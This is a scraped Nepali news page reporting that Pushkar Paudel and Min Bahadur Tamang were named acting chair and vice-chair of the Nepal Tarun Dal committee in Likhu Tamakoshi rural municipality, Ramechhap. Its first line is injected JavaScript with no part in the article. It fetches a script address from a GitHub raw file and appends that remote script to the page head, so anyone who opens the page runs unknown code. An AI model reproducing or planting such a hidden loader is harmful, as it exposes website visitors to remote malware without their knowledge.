;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तरुण दल लिखु तामाकोशी गाउँपालिकाको कार्यबहाक सभापतिमा पाैडेल र उपसभापतिमा तामाङ – जुनेली न्युज
सोमवार, असार १०, २०८२
  • होमपेज
  • तरुण दल लिखु तामाकोशी गाउँपालिकाको कार्यबहाक सभापतिमा पाैडेल र उपसभापतिमा तामाङ
जुनेली बिशेष

तरुण दल लिखु तामाकोशी गाउँपालिकाको कार्यबहाक सभापतिमा पाैडेल र उपसभापतिमा तामाङ

मंसिर ०६,

रामेछाप । नेपाल तरुण दल लिखु तामाकोसी गाउँपालिकाले कार्यबहाक सभापतिको जिम्मेवारी पुष्कर पाैडेललाई जिम्मा लगाएको छ ।

शनिबार नेपाली कांग्रेसका जिल्ला सभापति लवश्री न्यौपानी, सचिव विष्णु बस्नतेसहित विद्यार्थी संघका नेताहरुको उपस्थितिमा पौडेललाई जिम्मेवारी दिएको हो ।

त्यस्तै उपसभापतिमा मीन बहादुर तामाङ (मिलन) लाई जिम्मेवारी दिएको छ ।

जिल्लाको आठ वटै स्थानी तहरुमा संगठन विस्तारमा रहेको संघठनले पछिल्लो समयमा समिति गठन, वडा, पालिकालाई तिवृ पारेको छ।

फेसबुक प्रतिक्रियाहरु